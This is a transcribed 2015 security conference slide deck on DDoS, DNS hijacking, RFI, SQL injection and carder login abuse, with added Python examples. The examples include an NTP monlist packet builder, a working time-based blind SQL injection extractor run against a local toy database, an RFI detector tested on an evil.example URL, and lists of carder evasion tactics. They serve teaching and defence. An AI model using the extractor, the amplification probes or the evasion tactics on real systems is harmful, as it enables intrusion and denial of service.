    • Volumetric protection: massive resiliency; thousands of points of presence; distributed geographically; rate controls for noisy requestors
    • Attacks against CNAMEs: network and application layer filtering capable; protocol validation/filtering; SSL decrypt and re-encrypt; geo sensing and filtering capable; capacity: throughput and packets per second
    • Attacks against datacenter IPs: direct-to-origin protection using BGP redirection; multiple globally distributed scrubbing centers; attack capacity to withstand multiple attacks at once; good-traffic bypass so as not to degrade performance
  • 35. Multiple Perimeters for Internet-facing Applications (continued)
    • Application layer attacks: SSL decryption at scale; risk-scoring rule sets; tune accuracy over time
    • Attacks against DNS: rate controls and connection throttling; whitelisting; application inspection; DNSSEC; client/server locks; anycast responses
    • Event visibility: threat intel gathered and validated against a global dataset; real-time event correlation between security policies; ability to identify hosts based on previous malicious behavior; import the log feed from the 'cloud' into the internal SIEM for correlation
  • 36. HOW DO YOU IDENTIFY & CLASSIFY?
  • 37. THERE'S A DIFFERENCE BETWEEN VISIBILITY & INSIGHT
  • 38. CLIENT REPUTATION SCORING: use behavioral data to protect your castle: collect and correlate attack traffic into a large dataset from across the web; identify bad clients based on past behavior; define a risk score for malicious clients; filter malicious clients based on risk score
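The scoring design on slide 38, worked through as an added example (this is not Akamai's implementation; the event shape, rule weights, seven-day half-life and the block/challenge thresholds are assumptions, and the events are constructed). Two signals carry the score: how severe and how recent each client's past attacks were, and how many unrelated properties it has hit, which only a pooled, cross-site dataset can tell you.

```python
"""Client reputation scoring from a cross-site attack dataset.

Added example, not Akamai's implementation. The event shape, rule weights,
half-life and thresholds are assumptions chosen to illustrate the slide's
design: pool attack events from many properties, score each client on its
past behaviour, then filter requests on that score.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, Tuple

RULE_WEIGHT = {"sqli": 5.0, "rfi": 4.0, "scanner": 2.0, "rate": 1.0}  # assumed severities
HALF_LIFE_DAYS = 7.0                  # assumed: an attack seen a week ago counts half as much
BLOCK_AT, CHALLENGE_AT = 10.0, 3.0    # assumed score thresholds
NOW = 1443830400                      # fixed reference clock (2015-10-03T00:00:00Z) for a deterministic run

Event = Tuple[int, str, str, str]     # (unix_ts, client_ip, attacked_site, rule_class)

# Constructed events, as a shared dataset would deliver them. Not real traffic.
EVENTS: list = [
    (NOW - 3600,        "198.51.100.7", "shop.example", "sqli"),
    (NOW - 7200,        "198.51.100.7", "bank.example", "sqli"),
    (NOW - 2 * 86400,   "198.51.100.7", "news.example", "rfi"),
    (NOW - 600,         "203.0.113.9",  "shop.example", "rate"),
    (NOW - 30 * 86400,  "203.0.113.9",  "shop.example", "sqli"),
    (NOW - 10 * 86400,  "192.0.2.44",   "bank.example", "sqli"),
    (NOW - 1 * 86400,   "192.0.2.44",   "bank.example", "scanner"),
]


@dataclass
class Reputation:
    score: float   # decayed, breadth-weighted sum of rule severities
    sites: int     # distinct properties this client attacked
    events: int


def decay(age_seconds: float) -> float:
    """Exponential decay so stale history fades instead of blocking forever."""
    return 0.5 ** (age_seconds / (HALF_LIFE_DAYS * 86400))


def build_reputation(events: Iterable[Event], now: int = NOW) -> Dict[str, Reputation]:
    base = defaultdict(float)
    sites = defaultdict(set)
    count = defaultdict(int)
    for ts, ip, site, rule in events:
        if ts > now:
            continue  # skip clock-skewed "future" events rather than over-weighting them
        base[ip] += RULE_WEIGHT.get(rule, 1.0) * decay(now - ts)
        sites[ip].add(site)
        count[ip] += 1
    rep = {}
    for ip, total in base.items():
        # A client hitting many unrelated sites is far more likely a scanner or bot
        # than a confused user; breadth across the dataset is the key signal.
        breadth = 1.0 + 0.5 * (len(sites[ip]) - 1)
        rep[ip] = Reputation(round(total * breadth, 2), len(sites[ip]), count[ip])
    return rep


def classify(ip: str, rep: Dict[str, Reputation]) -> str:
    """Filter decision for one client: block, challenge (e.g. JS/CAPTCHA), or allow."""
    r = rep.get(ip)
    if r is None:
        return "allow"   # no history says nothing about the client; other controls still apply
    if r.score >= BLOCK_AT:
        return "block"
    if r.score >= CHALLENGE_AT:
        return "challenge"
    return "allow"


if __name__ == "__main__":
    reputation = build_reputation(EVENTS)
    for client, r in sorted(reputation.items(), key=lambda kv: -kv[1].score):
        print(f"{client:15} score={r.score:6.2f} sites={r.sites} -> {classify(client, reputation)}")
```

The decay is what keeps a reputation list from turning into a permanent blocklist of dynamic addresses that have long since been reassigned; the breadth multiplier is what separates the client probing three unrelated properties from a tenant's own badly written integration hammering one site.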
  • 39. Information vs. Intelligence
    • Information: raw, unfiltered feed; aggregated from virtually every source; may be true, false, misleading, incomplete, relevant or irrelevant; not actionable
    • Intelligence: processed, sorted information; aggregated from reliable sources and cross-correlated for accuracy; accurate, timely, complete, assessed for relevancy; actionable
    InfoSec teams are swimming in data. More raw "information" is not the solution.
  • 40. Threats Change/Advance Over Time. Unique Shellshock payloads per day after disclosure: 9/24: 53 (Shellshock disclosed); 9/25: 11,008; 9/26: 16,135; 9/27: 21,359; 9/28: 15,071; 9/29: 30,427; 9/30: 69,226; 10/1: 124,625
  • 42. Case Study: 320 Gbps DDoS Attack, Gaming Vertical, APAC Region. Largest attack ever mitigated by Akamai against a single customer; targeted the primary website, supporting network infrastructure, and DNS. Multiple attack vectors: SYN/UDP floods against an entire subnet; volumetric attack against DNS. Attack characteristics: 320 Gbps and 71.5 Mpps peak traffic; 2.1 million requests/s against DNS
  • 43. One Attack in a Broader DDoS Attack Campaign: a 21+ day campaign against a single customer; 39 distinct attacks targeting applications and DNS infrastructure; eight attacks >100 Gbps, including the record 320 Gbps attack. [Chart: per-attack peak sizes by start/end time for infrastructure (Gbps), web (Gbps), authoritative DNS (Mpps) and DNS reflection (Mpps); individual bar values are not recoverable in order.]
  • 44. Olympics, opening ceremony and 1st day of sports: 132 BILLION requests processed by our WAFs, 10x more than the 2010 Winter Olympics; WAF rules triggered 127x more than the 2010 Winter Olympics; custom rules triggered: 166,000,000; rate controls (adaptive rules) triggered: 5,600,000; requests denied: 182,200,000
  • 45. [Charts: attack traffic over time during the opening ceremony and during matches (Spain vs. Netherlands, Chile vs. Australia, Ivory Coast vs. Japan); axis values are not recoverable from the slide image.]
  • 46. Web Application Attacks by Industry – Q1 2015 [chart]
  • 47. The Attack du jour? SNMP reflection: a reflection attack using mostly SNMP v2c devices (~3+ years old) with the default "public" community string: routers, printers, cable modems, NAS. A new tool automates sending getBulkRequest to open SNMP servers; the flood of SNMP GetResponse data is sent from the reflectors to the victim on port 80. The SNMP query begins at the highest (OID) tree level to obtain the largest possible response.
  • 49. Case Study: NTP Attacks on Origin. 500x return rate in traffic; >100 Gbps attack traffic against origin; 1,000+ increase in hits per second against origin. Attack vector: a request with the spoofed source IP of the target server is sent to a vulnerable NTP server that allows the monlist function; the NTP server replies back to the target IP, direct to origin, at massive scale.
  • 50. Use the nmap NSE script to identify vulnerable hosts. Example: nmap -sU -pU:123 -Pn -n --script=ntp-monlist <target>
    • The monitor list returned in response to the monlist command is limited to 600 associations.
    • The monitor capability may not be enabled on the target, in which case you may receive error number 4 (No Data Available).
    • There may be a restriction on who can perform Mode 7 commands (e.g. "restrict noquery" in ntp.conf), in which case you may not receive a reply.
    • This script does not handle authentication; targets expecting auth info may respond with error number 3 (Format Error).
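What the nmap script above actually sends and receives, as an added example (not part of the talk and not nmap's code): a builder for the 48-byte mode 7 MON_GETLIST_1 request, a parser for the reply that decodes the error codes the slide mentions (4 = No Data Available, 3 = Format Error) and the 72-byte monitor entries, and an amplification calculation. The reply bytes are constructed here so it runs offline; only the packet layout is real. The "600 entries in 100 packets of 440 bytes" figure is derived from that layout, not measured.

```python
"""NTP mode 7 MON_GETLIST_1 ("monlist") request builder and response parser.

Added example, not part of the talk or of nmap. It shows on the wire what the
ntp-monlist script probes for and lets you measure the amplification a
reflector yields. The response bytes are constructed here so the example runs
offline; only the packet layout (ntpd's ntp_request.h) is real.
"""
import ipaddress
import struct
from typing import Dict, List

IMPL_XNTPD = 3              # implementation number ntpd answers to
REQ_MON_GETLIST_1 = 42      # the monlist request code
MONLIST_ITEM_SIZE = 72      # bytes per info_monitor_1 entry
HEADER = struct.Struct("!BBBBHH")  # rm_vn_mode, auth_seq, implementation, request, err|nitems, mbz|itemsize
ERROR_NAMES = {0: "ok", 1: "Incompatible Implementation", 2: "Unknown Request",
               3: "Format Error", 4: "No Data Available"}


def build_monlist_request(version: int = 2) -> bytes:
    """8-byte mode 7 header plus 40 zeroed data bytes: 48 bytes on the wire."""
    rm_vn_mode = (version << 3) | 7          # response=0, more=0, version, mode 7
    return HEADER.pack(rm_vn_mode, 0, IMPL_XNTPD, REQ_MON_GETLIST_1, 0, 0) + bytes(40)


def parse_monlist_response(packet: bytes) -> Dict:
    if len(packet) < HEADER.size:
        raise ValueError("short packet")
    rm_vn_mode, _seq, _impl, req, err_nitems, mbz_itemsize = HEADER.unpack_from(packet)
    result = {
        "is_response": bool(rm_vn_mode & 0x80),
        "more": bool(rm_vn_mode & 0x40),       # set when further packets follow
        "version": (rm_vn_mode >> 3) & 0x07,
        "mode": rm_vn_mode & 0x07,
        "error": ERROR_NAMES.get(err_nitems >> 12, f"unknown({err_nitems >> 12})"),
        "items": [],
    }
    nitems, itemsize = err_nitems & 0x0FFF, mbz_itemsize & 0x0FFF
    if result["error"] != "ok" or req != REQ_MON_GETLIST_1 or itemsize < MONLIST_ITEM_SIZE:
        return result
    for i in range(nitems):
        chunk = packet[HEADER.size + i * itemsize: HEADER.size + (i + 1) * itemsize]
        if len(chunk) < MONLIST_ITEM_SIZE:
            break  # truncated packet: keep what parsed cleanly
        (_avg, _last, _restr, count, addr, _daddr, _flags,
         port, mode, ver, v6_flag) = struct.unpack("!IIIIIIIHBBI", chunk[:36])
        client = (ipaddress.IPv6Address(chunk[40:56]) if v6_flag
                  else ipaddress.IPv4Address(addr))
        result["items"].append({"client": str(client), "count": count,
                                "port": port, "mode": mode, "version": ver})
    return result


def amplification_factor(responses: List[bytes], request: bytes) -> float:
    """Bandwidth amplification on UDP payload bytes (IP/UDP headers excluded)."""
    return sum(len(r) for r in responses) / len(request)


# --- constructed reflector output (not captured traffic) -------------------
def _item(ipv4: str, count: int, port: int = 123) -> bytes:
    addr = int(ipaddress.IPv4Address(ipv4))
    return struct.pack("!IIIIIIIHBBI", 0, 0, 0, count, addr, 0, 0, port, 3, 4, 0) + bytes(36)

SAMPLE_OK = (HEADER.pack(0x80 | 0x17, 0, IMPL_XNTPD, REQ_MON_GETLIST_1, 2, MONLIST_ITEM_SIZE)
             + _item("192.0.2.10", 1523) + _item("198.51.100.25", 77))
SAMPLE_NODATA = HEADER.pack(0x80 | 0x17, 0, IMPL_XNTPD, REQ_MON_GETLIST_1, 4 << 12, 0)
# A full 600-entry monitor list is 100 packets of 8 + 6 * 72 = 440 bytes each.
FULL_MONLIST = [HEADER.pack(0x80 | 0x17, 0, IMPL_XNTPD, REQ_MON_GETLIST_1, 6, MONLIST_ITEM_SIZE)
                + _item("192.0.2.1", 1) * 6] * 100

if __name__ == "__main__":
    print(build_monlist_request().hex())
    print(parse_monlist_response(SAMPLE_OK))
    print(f"payload amplification for a full list: {amplification_factor(FULL_MONLIST, build_monlist_request()):.1f}x")
```

Two things to keep in mind when comparing numbers: published factors such as the 556.9x on slide 9 are usually computed with IP and UDP headers included, which lowers the ratio relative to the payload-only figure above, and a reflector whose monitor list is nearly empty amplifies far less, so "vulnerable" and "useful to an attacker" are different findings. Send the request only to hosts you are authorised to test.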
  • 51. SSDP, the discovery protocol of UPnP ("Universal Plug and Pray"): reflection using the SSDP 200 OK response
  • 52. DNS Attack Targeting Akamai Customer: DNS requests peaked at 168k per second; 19B hits in 5 days, against a normal volume of ~30M hits per week
  • 53. DNS Hijack Attacks: a common tactic for Middle Eastern attackers (example: US DoD's DNS hijacked). Best practice: DNS locks. Registrar-set (client) locks: clientUpdateProhibited, clientTransferProhibited, clientDeleteProhibited. Registry-set (server) locks: serverUpdateProhibited, serverTransferProhibited, serverDeleteProhibited
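A way to audit the lock set above across your domains, as an added example (not from the talk): WHOIS output lists each EPP status on a "Domain Status:" line, so the check is a parse and a set difference. The two WHOIS texts below are constructed; registrar formatting varies, but the status line format is standard.

```python
"""Check a domain's EPP status codes for the lock set the slide recommends.

Added example, not part of the talk. It parses registrar WHOIS output, which
lists each status on a "Domain Status:" line; the sample texts below are
constructed (real output varies by registrar but keeps that line format).
"""
import re
from typing import Dict, List, Set

REGISTRAR_LOCKS = {"clientUpdateProhibited", "clientTransferProhibited", "clientDeleteProhibited"}
REGISTRY_LOCKS = {"serverUpdateProhibited", "serverTransferProhibited", "serverDeleteProhibited"}
STATUS_RE = re.compile(r"^\s*Domain Status:\s*([A-Za-z]+)", re.MULTILINE)


def epp_statuses(whois_text: str) -> Set[str]:
    """Every EPP status code present in a WHOIS record (the trailing URL is ignored)."""
    return set(STATUS_RE.findall(whois_text))


def missing_locks(whois_text: str, require_registry: bool = False) -> Dict[str, List[str]]:
    """Compare the record against the registrar lock set, optionally the registry set too."""
    have = epp_statuses(whois_text)
    wanted = REGISTRAR_LOCKS | (REGISTRY_LOCKS if require_registry else set())
    return {
        "present": sorted(have & wanted),
        "missing": sorted(wanted - have),
        "other": sorted(have - wanted),   # e.g. clientHold or pendingDelete deserve a look too
    }


# Constructed WHOIS excerpts, not real records.
LOCKED = """Domain Name: EXAMPLE.COM
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
"""
PARTIAL = """Domain Name: EXAMPLE.NET
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientHold https://icann.org/epp#clientHold
"""

if __name__ == "__main__":
    for label, text in (("example.com", LOCKED), ("example.net", PARTIAL)):
        print(label, missing_locks(text, require_registry=True))
```

Feed it the output of `whois <domain>` for each domain you own. The registrar (client) locks stop the everyday risk of a hijacked registrar account changing nameservers; the registry (server) locks are the stronger control and usually a paid "registry lock" service, which is why they are checked separately.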
  • 54. Remote File Inclusion: an RFI attempt to pull a click.php file from a remote location, using the RFI vulnerability in the TimThumb plugin
  • 55. Here's what click.php is really about: HTTP(S) redirections that fluctuate between 14-20 different pay-per-click companies and advertisers, and that means precious bitcoin revenue for the attacker and his friends. http://www.secureworks.com/cyber-threat-intelligence/threats/ppc-hijack/
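A detection for the request pattern in the TimThumb case, as an added example (not from the talk or any WAF product; the allowlist host and the request targets are constructed): flag any query parameter whose value, after undoing repeated percent-encoding, names a remote URL or a PHP stream wrapper, and compare the host against an allowlist by exact match. The exact match matters: the original TimThumb flaw was an allowlist check that accepted a trusted domain appearing anywhere in the hostname, so `http://trusted.example.evil.example/` passed.

```python
"""Flag remote-file-inclusion attempts in request URLs.

Added example, not part of the talk or of any WAF product. The allowlist and
sample request targets are constructed. It implements the check the TimThumb
case calls for: a parameter that names a remote URL or a PHP stream wrapper,
compared against an exact-host allowlist.
"""
import re
from typing import List, Tuple
from urllib.parse import parse_qsl, unquote, urlsplit

ALLOWED_REMOTE_HOSTS = {"cdn.shop.example"}     # assumed: hosts the app may legitimately fetch from
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps"}
WRAPPER_SCHEMES = {"php", "data", "file", "phar", "expect"}   # never legitimate in a URL parameter
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.-]*):", re.I)


def normalize(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding so %2568 -> %68 -> h is seen as the attacker meant it."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.strip()


def rfi_findings(request_target: str) -> List[Tuple[str, str, str]]:
    """Return (parameter, scheme, host) for every parameter value that would fetch remote code."""
    findings = []
    query = urlsplit(request_target).query
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = normalize(raw)
        if value.startswith("//"):
            # Scheme-relative URL: still a remote fetch, and it slips past a "http://" prefix check.
            scheme, host = "//", (urlsplit("http:" + value).hostname or "").lower()
        else:
            m = SCHEME_RE.match(value)
            if not m:
                continue                        # relative paths like /account are fine here
            scheme = m.group(1).lower()
            if scheme in WRAPPER_SCHEMES:
                findings.append((name, scheme, ""))
                continue
            if scheme not in REMOTE_SCHEMES:
                continue                        # mailto:, tel:, etc. cannot include a file
            host = (urlsplit(value).hostname or "").lower()
        # Exact match, not substring: "cdn.shop.example.evil.example" must not pass.
        if host not in ALLOWED_REMOTE_HOSTS:
            findings.append((name, scheme, host))
    return findings


if __name__ == "__main__":
    for target in ("/wp-content/themes/t/timthumb.php?src=http://evil.example/click.php",
                   "/wp-content/themes/t/timthumb.php?src=http://cdn.shop.example/a.jpg",
                   "/index.php?page=php://input"):
        print(target, "->", rfi_findings(target))
```

In production the same check belongs in the application (never fetch a user-supplied URL without an allowlist) and, as defence in depth, at the edge where it can also catch the double-encoded and scheme-relative variants shown in the tests.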
  • 56. When good things go bad: Rogue Reseller to Competitor. "At first they were just scraping our site and we saw it to be mutually beneficial…" "After years of this relationship we recently found that they now have a copycat site and are selling our products that they are now manufacturing on their own." – Enterprise Manufacturing Customer
  • 57. Blind SQL Injection: Time-Based Attack. This type of blind SQL injection relies on injecting a condition that makes the database pause for a specified amount of time when it is true, and examining how long the response takes. Using this method, an attacker enumerates each letter of the desired piece of data without ever seeing any query output. [Screenshot: client request]
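The technique end to end, as an added example that is not part of the talk: a deliberately vulnerable lookup that concatenates input into SQL, the attacker loop that recovers a secret one character at a time by timing responses (binary search on the character code, so about seven timed requests per character rather than one per candidate letter), the parameterised fix, and the signature a WAF would match. SQLite has no SLEEP(), so a Python sleep is registered as a SQL function to stand in for MySQL's SLEEP() or PostgreSQL's pg_sleep(); the table, the secret and the 0.1 s delay are constructed, and the run takes a few seconds.

```python
"""Time-based blind SQL injection: vulnerable lookup, the extraction loop, and the fix.

Added example, not part of the talk. SQLite has no SLEEP(), so a Python sleep()
is registered as a SQL function to stand in for MySQL SLEEP()/PostgreSQL pg_sleep();
the table, secret and delay are constructed. The attacker side never sees query
output; it only times the response, which is exactly the slide's point.
"""
import re
import sqlite3
import time

DELAY = 0.1   # seconds the injected branch sleeps (assumed; real attacks use several seconds)


def _sql_sleep(seconds: float) -> int:
    time.sleep(seconds)
    return 0


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.create_function("sleep", 1, _sql_sleep)
    conn.execute("CREATE TABLE users(name TEXT, api_key TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'k3y-42')")   # constructed secret
    return conn


def vulnerable_lookup(conn, name: str):
    # DELIBERATELY VULNERABLE: user input is concatenated into the statement.
    return conn.execute("SELECT name FROM users WHERE name = '" + name + "'").fetchall()


def safe_lookup(conn, name: str):
    # Fixed form: a bound parameter is data, never SQL, so no branch can be injected.
    return conn.execute("SELECT name FROM users WHERE name = ?", (name,)).fetchall()


# ---- attacker side: a yes/no oracle built from response time ---------------
def _is_true(conn, condition: str) -> bool:
    payload = f"x' OR (CASE WHEN ({condition}) THEN sleep({DELAY}) ELSE 0 END) -- "
    t0 = time.perf_counter()
    vulnerable_lookup(conn, payload)             # the app returns nothing useful...
    return time.perf_counter() - t0 > DELAY / 2  # ...but how long it took leaks one bit


def _search(conn, expr: str, lo: int, hi: int) -> int:
    """Binary search for the integer value of a SQL expression using '>' probes."""
    while lo < hi:
        mid = (lo + hi) // 2
        if _is_true(conn, f"{expr} > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_secret(conn, max_len: int = 32) -> str:
    """Recover alice's api_key one character at a time, ~7 timed requests per character."""
    secret = "(SELECT api_key FROM users WHERE name = 'alice')"
    length = _search(conn, f"length({secret})", 0, max_len)
    return "".join(chr(_search(conn, f"unicode(substr({secret}, {i}, 1))", 32, 126))
                   for i in range(1, length + 1))


# ---- defender side: the obvious signature; the real fix is safe_lookup -----
DELAY_SIGNATURE = re.compile(r"\b(sleep|pg_sleep|benchmark)\s*\(|waitfor\s+delay", re.I)


def looks_like_time_based(value: str) -> bool:
    return bool(DELAY_SIGNATURE.search(value))


if __name__ == "__main__":
    db = make_db()
    print("leaked via timing:", extract_secret(db))
    print("same payload against safe_lookup:", safe_lookup(db, "x' OR 1=1 -- "))
```

The signature catches the textbook payload and nothing cleverer (comment splicing and heavy-query variants that do not name a delay function), which is why it belongs in a WAF as a tripwire and not in the application as the fix; the fix is the bound parameter in `safe_lookup`, against which the same payload is just an unusual username.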
  • 58. SQL Injection Analysis: 2,000 customers over one week, protocol breakdown: HTTP 8,137,681 (96.6%); HTTPS 287,808 (3.4%); total 8,425,489 (100%). [Chart: breakdown by intent; values not recoverable from the slide image.] Source: Akamai CSI
  • 60. [Screenshot: Remote File Inclusion attack request and client info]
  • 62. ACCOUNT CHECKERS: CARDERS. Several techniques are used to avoid detection and mitigation, including: randomization of the User-Agent header; targeting of alternative (mobile/API/legacy) login pages, which may have weaker mitigation controls and are often overlooked by the customer; attacks originating from a highly distributed set of IP addresses, with different source countries; use of low request rates to evade rate controls; changes in the order of headers; changes in tactics when 403 responses are received
  • 63. Fraud: Vietnamese Carders. Carder TTPs: build a tools server; cultivate a list of open proxies; acquire compromised logins; check/alter compromised accounts; make fraudulent purchases; cash out / resell gift cards
  • 64. Login Abuse: THE STRUGGLE IS REAL. You know who you are!
  • 65. Login Abuses: TTPs and Defenses
    • Rate controls to block fast-moving scripts: the attack relies on being able to check thousands of accounts quickly; blocking aggressive scripts prevents login exploitation
    • Internal monitoring for changes to customer accounts: email address; shipping address; the same email on multiple accounts
    • Geo blocklists for areas where there is no business: cuts down on the places attackers can launch from; do cloud server providers need to access your webpage?
    • Custom rules to block User-Agent strings (or the lack thereof): attack scripts are often simple and will contain only "curl" or "wget", and sometimes no User-Agent at all
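The defenses on slide 65 as detections over login records, added here as an example (not from the talk; the events, thresholds, tool User-Agent list and the account-change feed are constructed). The second detection is the one the evasions on slide 62 are designed to beat: an attacker spreading one account's attempts across many IPs at a low rate never trips a per-IP rate control, but the account itself still shows failures from an implausible number of sources.

```python
"""Login-abuse detections over web-server logs: the defenses on slide 65.

Added example, not part of the talk. The event records, thresholds, user-agent
patterns and account-change feed are constructed; a real deployment would read
the same fields from access logs and from the account service's audit trail.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set, Tuple

RATE_LIMIT = (10, 60)     # assumed: more than 10 login attempts from one IP inside 60 s
SPRAY_MIN_IPS = 4         # assumed: failures for one account from >= 4 distinct IPs
TOOL_UA = re.compile(r"^(curl|wget|python-requests|go-http-client|libwww-perl)\b", re.I)
BROWSER_UA = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0 Safari/537.36"


@dataclass(frozen=True)
class LoginEvent:
    ts: int        # unix seconds
    ip: str
    account: str
    ua: str
    path: str
    ok: bool


def rate_alerts(events: Iterable[LoginEvent]) -> Set[str]:
    """IPs whose attempt count in any sliding window exceeds RATE_LIMIT (fast scripts)."""
    limit, window = RATE_LIMIT
    by_ip: Dict[str, List[int]] = defaultdict(list)
    for e in events:
        by_ip[e.ip].append(e.ts)
    flagged = set()
    for ip, stamps in by_ip.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:
                start += 1
            if end - start + 1 > limit:
                flagged.add(ip)
                break
    return flagged


def distributed_alerts(events: Iterable[LoginEvent]) -> Set[str]:
    """Accounts failing from many IPs at low per-IP rates, which rate limits alone miss."""
    ips_by_account: Dict[str, Set[str]] = defaultdict(set)
    for e in events:
        if not e.ok:
            ips_by_account[e.account].add(e.ip)
    return {acct for acct, ips in ips_by_account.items() if len(ips) >= SPRAY_MIN_IPS}


def user_agent_alerts(events: Iterable[LoginEvent]) -> Set[str]:
    """IPs sending no User-Agent, or a bare tool agent, to a login endpoint."""
    return {e.ip for e in events if not e.ua.strip() or TOOL_UA.match(e.ua)}


def shared_email_alerts(changes: Iterable[Tuple[str, str]]) -> Dict[str, Set[str]]:
    """The same contact e-mail newly set on several accounts: a carder consolidating loot."""
    accounts_by_email: Dict[str, Set[str]] = defaultdict(set)
    for account, email in changes:
        accounts_by_email[email.lower()].add(account)
    return {email: accts for email, accts in accounts_by_email.items() if len(accts) > 1}


# Constructed sample, not real logs.
SAMPLE: List[LoginEvent] = (
    # one IP, 15 attempts in 30 s, curl UA, a different account each time
    [LoginEvent(1000 + 2 * i, "198.51.100.7", f"user{i}", "curl/7.43.0", "/login", False) for i in range(15)]
    # one account probed from five IPs, one try each, a minute apart, browser UA, mobile login page
    + [LoginEvent(2000 + 60 * i, f"203.0.113.{i + 1}", "bob", BROWSER_UA, "/m/login", False) for i in range(5)]
    + [LoginEvent(3000, "192.0.2.50", "alice", BROWSER_UA, "/login", True)]       # normal user
    + [LoginEvent(3100, "192.0.2.99", "carol", "", "/api/v1/login", False)]       # no UA, legacy API
)
CHANGES = [("user3", "drop@mail.example"), ("user9", "DROP@mail.example"), ("alice", "alice@home.example")]

if __name__ == "__main__":
    print("rate:", rate_alerts(SAMPLE))
    print("distributed:", distributed_alerts(SAMPLE))
    print("user-agent:", user_agent_alerts(SAMPLE))
    print("shared e-mail:", shared_email_alerts(CHANGES))
```

Run the rate and User-Agent rules at the edge, where they can block; run the per-account and account-change rules on the inside, where they have the data, and feed their findings back into the edge rules (the "import log feed into the SIEM for correlation" point on slide 35). Keep every login path, including `/m/login` and `/api/v1/login`, in scope of all four.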
  • 68. DD4BC (DDoS for Bitcoin). Industries affected: payment processing; banking and credit unions; gambling; oil and gas; e-commerce; high tech consulting/services. Attack types: booter/stresser sites are the most likely culprit; reflection attacks
  • 69. Looking Forward into 2015
    • Industry verticals: gaming, financial services, Internet and telecom, software and tech, and media verticals are expected to be targeted heavily in 2015; security vulnerabilities continue to increase due to bespoke/custom applications; good history of successful attacks
    • DDoS attacks: expect more 'mega' attacks >100 Gbps; commoditization of DDoS attacks; IPv6 uptake to increase the DDoS vector; never pay ransoms, but do have a plan
    • Application attack trends: APPSEC IS FAILING – NEED HELP! IF YOU DON'T HAVE AN APPSEC PROGRAM, START ONE! INJECTION & XSS RIDE THE OWASP TOP 10; SESSION MGMT – YOU'RE DOING IT WRONG; DEVELOPERS – YOU'RE BEHIND!
  • 70. Cyber Security Requirements: 5 Points To Take Away. 1. You need 'validated' data, to derive intelligence on current and evolving threats. 2. Scale, availability and resilience, to be high performing, take the punches, and stay online. 3. A plan, to understand how to respond to bad-day scenarios. 4. Control and flexibility, to adapt your defenses dynamically. 5. People and experience, to execute every time you come under attack.
  • 71. RESOURCES
    • OWASP: Open Web Application Security Project: https://www.owasp.org/index.php/Main_Page
    • BSIMM5: Building Security In Maturity Model v5: https://www.bsimm.com/
    • SANS SWAT: Securing Web Application Technologies v1.1: http://software-security.sans.org/resources/swat
    • CERT: Secure Coding Standards: http://www.cert.org/secure-coding/research/secure-coding-standards.cfm?
    • Akamai Technologies (hey, why not): https://www.akamai.com/us/en/cloud-security.jsp
  • 72. Tony Lauro | CISSP, GWAPT, Senior Enterprise Security Architect, @tonylauro
  • 73. Thank you. The Collin College Engineering Department; Collin College Student Chapter of the North Texas ISSA; North Texas ISSA (Information Systems Security Association). NTX ISSA Cyber Security Conference – October 2-3, 2015